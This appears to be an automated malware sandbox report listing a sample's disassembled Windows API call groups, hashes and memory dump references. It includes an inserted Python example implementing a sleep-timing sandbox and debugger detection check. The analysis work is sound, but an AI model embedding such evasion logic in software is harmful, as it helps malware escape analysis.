                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB7D0B
                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FB7D2A
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FB7D42
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F9B7AD,00000000), ref: 00FB7D6B
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID:
                                                      • API String ID: 847901565-0
                                                      APIs
                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00FB56BB
                                                      • _wcslen.LIBCMT ref: 00FB56CD
                                                      • _wcslen.LIBCMT ref: 00FB56D8
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FB5816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_wcslen
                                                      • String ID:
                                                      • API String ID: 455545452-0
                                                      APIs
                                                      • SetTextColor.GDI32(?,?), ref: 00F398D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F398E9
                                                      • GetStockObject.GDI32(00000005), ref: 00F398F1
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ColorLongModeObjectStockTextWindow
                                                      • String ID:
                                                      • API String ID: 2960364272-0
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00F81A47
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F81A59
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F81A6F
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F81A8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F8E1FD
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00F8E230
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F8E246
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F8E24D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,?,00F4CFF9,00000000,00000004,00000000), ref: 00F4D218
                                                      • GetLastError.KERNEL32 ref: 00F4D224
                                                      • __dosmaperr.LIBCMT ref: 00F4D22B
                                                      • ResumeThread.KERNEL32(00000000), ref: 00F4D249
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                      • String ID:
                                                      • API String ID: 173952441-0
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F2604C
                                                      • GetStockObject.GDI32(00000011), ref: 00F26060
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2606A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00F43B56
                                                        • Part of subcall function 00F43AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F43AD2
                                                        • Part of subcall function 00F43AA3: ___AdjustPointer.LIBCMT ref: 00F43AED
                                                      • _UnwindNestedFrames.LIBCMT ref: 00F43B6B
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F43B7C
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00F43BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F213C6,00000000,00000000,?,00F5301A,00F213C6,00000000,00000000,00000000,?,00F5328B,00000006,FlsSetValue), ref: 00F530A5
                                                      • GetLastError.KERNEL32(?,00F5301A,00F213C6,00000000,00000000,00000000,?,00F5328B,00000006,FlsSetValue,00FC2290,FlsSetValue,00000000,00000364,?,00F52E46), ref: 00F530B1
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F5301A,00F213C6,00000000,00000000,00000000,?,00F5328B,00000006,FlsSetValue,00FC2290,FlsSetValue,00000000), ref: 00F530BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 9564506aa6e2c3c0257afdc20ea0023951396c53131a217bbbaa82e1cd0b5a5a
                                                      • Instruction ID: 324cbf5472f2e2a2cbe84178d7d43b09b6721e07948616a49aa9afb7152c0f47
                                                      • Opcode Fuzzy Hash: 9564506aa6e2c3c0257afdc20ea0023951396c53131a217bbbaa82e1cd0b5a5a
                                                      • Instruction Fuzzy Hash: 70018832711326ABCB214A7D9C84A677798AF457F6B110720FE05E71C0D721D909EAE0
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00F8747F
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F87497
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F874AC
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F874CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: 8f0dabf216b4471487ca733a72a2ad35215d769f6e0e7d02a160e7734fe30b46
                                                      • Instruction ID: fc2217d7cbbf20063ac994888e365238548fbe879cb89a814cd524008c438956
                                                      • Opcode Fuzzy Hash: 8f0dabf216b4471487ca733a72a2ad35215d769f6e0e7d02a160e7734fe30b46
                                                      • Instruction Fuzzy Hash: C5118BB2209314EBE720EF54DC48BD37BFCEB00B10F208569A656D6191D7B0E904EFA0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B0C4
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B0E9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B0F3
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F8ACD3,?,00008000), ref: 00F8B126
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: 5f015c685afd918c1ff24a275bae9c3c1cd850012470ffcd306e0c669377cb08
                                                      • Instruction ID: 5fea3ed1a0b043394d6d880ec2c63875540924840bdbe67cd5a28e7fe18a14cb
                                                      • Opcode Fuzzy Hash: 5f015c685afd918c1ff24a275bae9c3c1cd850012470ffcd306e0c669377cb08
                                                      • Instruction Fuzzy Hash: 35113931C0192CE7CF00EFA9E9986EEBB78FF09711F104186D981B6181CB305650AB91
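The four calls in the entry above (QueryPerformanceCounter, Sleep, QueryPerformanceCounter, Sleep) have the shape of a sleep-timing check: read a high-resolution clock, sleep, read it again, and compare the elapsed time with what was requested. The Python below is an added illustration written for this report, not code recovered from the sample; it uses time.perf_counter() as a stand-in for QueryPerformanceCounter and takes the sleep primitive as a parameter so that a hooked Sleep (one that returns immediately, as some sandboxes do) can be simulated. The fast/slow ratio thresholds are assumptions chosen for the example.

```python
"""Added example: sleep-timing check with an injectable sleep primitive.
Illustrative code for this report, not the sample's own code."""
import time
from typing import Callable


def measure_sleep(requested_s: float,
                  sleep_fn: Callable[[float], None] = time.sleep,
                  clock: Callable[[], float] = time.perf_counter) -> float:
    """Return the seconds that actually elapsed around one sleep_fn call.
    clock() plays the role of QueryPerformanceCounter, sleep_fn of Sleep."""
    start = clock()
    sleep_fn(requested_s)
    return clock() - start


def classify_timing(requested_s: float, elapsed_s: float,
                    fast_ratio: float = 0.5, slow_ratio: float = 20.0) -> str:
    """Classify elapsed/requested (thresholds are assumptions for this example):
    'accelerated' - returned far too early: Sleep hooked or clock skewed (sandbox)
    'stalled'     - far too late: breakpoints/single-stepping or a frozen VM
    'normal'      - within tolerance"""
    if requested_s <= 0:
        raise ValueError("requested_s must be positive")
    ratio = elapsed_s / requested_s
    if ratio < fast_ratio:
        return "accelerated"
    if ratio > slow_ratio:
        return "stalled"
    return "normal"


def timing_check(requested_s: float = 0.05, rounds: int = 2,
                 sleep_fn: Callable[[float], None] = time.sleep,
                 clock: Callable[[], float] = time.perf_counter) -> str:
    """Run the measurement `rounds` times (the entry above does it twice) and
    only report a verdict that every round agrees on, so one noisy round
    (e.g. a scheduler hiccup) does not flip the result."""
    verdicts = [classify_timing(requested_s, measure_sleep(requested_s, sleep_fn, clock))
                for _ in range(rounds)]
    for bad in ("accelerated", "stalled"):
        if verdicts.count(bad) == rounds:
            return bad
    return "normal"


if __name__ == "__main__":
    print("real sleep   :", timing_check())
    # Simulate a sandbox whose Sleep hook returns at once.
    print("hooked sleep :", timing_check(sleep_fn=lambda s: None))
```

A Sleep that is patched to return immediately yields the "accelerated" verdict; a breakpoint hit between the two clock reads yields "stalled". Requiring both rounds to agree is the cheap way to keep ordinary scheduling jitter from producing false positives.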
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F82DC5
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F82DD6
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F82DDD
                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F82DE4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: e48042b85af18dfc73b95d8f743ef8f93322de1cbb14984eab7c5b1e9c79b78a
                                                      • Instruction ID: ef7997edbbee103bb27cf8992d343f297b249d6e4507b70cec215b7b56fef85b
                                                      • Opcode Fuzzy Hash: e48042b85af18dfc73b95d8f743ef8f93322de1cbb14984eab7c5b1e9c79b78a
                                                      • Instruction Fuzzy Hash: B4E06D725012287BD7202B639C4DFEB3F6DEB42BA1F000215B509D10809AA09840EAF0
                                                      APIs
                                                        • Part of subcall function 00F39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F39693
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396A2
                                                        • Part of subcall function 00F39639: BeginPath.GDI32(?), ref: 00F396B9
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396E2
                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FB8887
                                                      • LineTo.GDI32(?,?,?), ref: 00FB8894
                                                      • EndPath.GDI32(?), ref: 00FB88A4
                                                      • StrokePath.GDI32(?), ref: 00FB88B2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: e36048c44d7fe7f377f1d47b21957ff1171a2b9d4cc6c1f83b2e37cefe9f6995
                                                      • Instruction ID: c34af36843fde0a70415bcbd4b49e501801d0f71e32357f6b6d7e7b4e68e674b
                                                      • Opcode Fuzzy Hash: e36048c44d7fe7f377f1d47b21957ff1171a2b9d4cc6c1f83b2e37cefe9f6995
                                                      • Instruction Fuzzy Hash: F7F03A36045259FBDB126F94AC4AFDA3A59AF06360F048100FA11A50E1C7B55511EFE5
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00F398CC
                                                      • SetTextColor.GDI32(?,?), ref: 00F398D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F398E9
                                                      • GetStockObject.GDI32(00000005), ref: 00F398F1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$ModeObjectStockText
                                                      • String ID:
                                                      • API String ID: 4037423528-0
                                                      • Opcode ID: 20336ef7dffddb41347804cdfd88262c46c64d14edeca65a49bf9449880807ef
                                                      • Instruction ID: f9bc7eafe112e39381c39428a5b581b080863adb34fec592c1f2cd4cf445879d
                                                      • Opcode Fuzzy Hash: 20336ef7dffddb41347804cdfd88262c46c64d14edeca65a49bf9449880807ef
                                                      • Instruction Fuzzy Hash: 25E06531644284AADB215B78AC49BD93F10AB11735F08C31AF6F9580E1C3714640AF11
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00F81634
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F811D9), ref: 00F8163B
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F811D9), ref: 00F81648
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F811D9), ref: 00F8164F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 11ce271fd6efd8d64d71ac6e6695e57572bed14da4e7596a09ee67a0f9550f17
                                                      • Instruction ID: dfe6d420804414f7234e0c8089ec278026e7c040127a52920270d5b788bdae31
                                                      • Opcode Fuzzy Hash: 11ce271fd6efd8d64d71ac6e6695e57572bed14da4e7596a09ee67a0f9550f17
                                                      • Instruction Fuzzy Hash: 4EE08631A01215DBD7202FA09D4DBC73B7CBF447E1F184918F285C9080E6344441EFA0
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00F7D858
                                                      • GetDC.USER32(00000000), ref: 00F7D862
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F7D882
                                                      • ReleaseDC.USER32(?), ref: 00F7D8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 33420e4fd4121378ccaca173302b0e44302906e0da25f07541bc7e51b3456294
                                                      • Instruction ID: 02098bb32bcd59cd4152d192f9b7639228c2c58a9dd797f4e1206ff13b9c2fde
                                                      • Opcode Fuzzy Hash: 33420e4fd4121378ccaca173302b0e44302906e0da25f07541bc7e51b3456294
                                                      • Instruction Fuzzy Hash: 43E01AB5C00208DFCB41AFA4D948A6EBBB6FB48310F108109E80AE7250C7384901BF91
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00F7D86C
                                                      • GetDC.USER32(00000000), ref: 00F7D876
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F7D882
                                                      • ReleaseDC.USER32(?), ref: 00F7D8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 7d238a4e955a8d731f8da6122ebf3bcaec1fa2626e5f9bfcb85decd6ef7f1a45
                                                      • Instruction ID: 3f80c063a2566fed2f3e1714d43e31bb31216b61a8b50551da0e7716b4d3e469
                                                      • Opcode Fuzzy Hash: 7d238a4e955a8d731f8da6122ebf3bcaec1fa2626e5f9bfcb85decd6ef7f1a45
                                                      • Instruction Fuzzy Hash: 6BE09AB5D04208DFCB51AFA4D948A6EBBB6BB48311F148549E94AE7250C7385901BF90
                                                      APIs
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F94ED4
                                                      Strings
                                                      Memory Dump Source
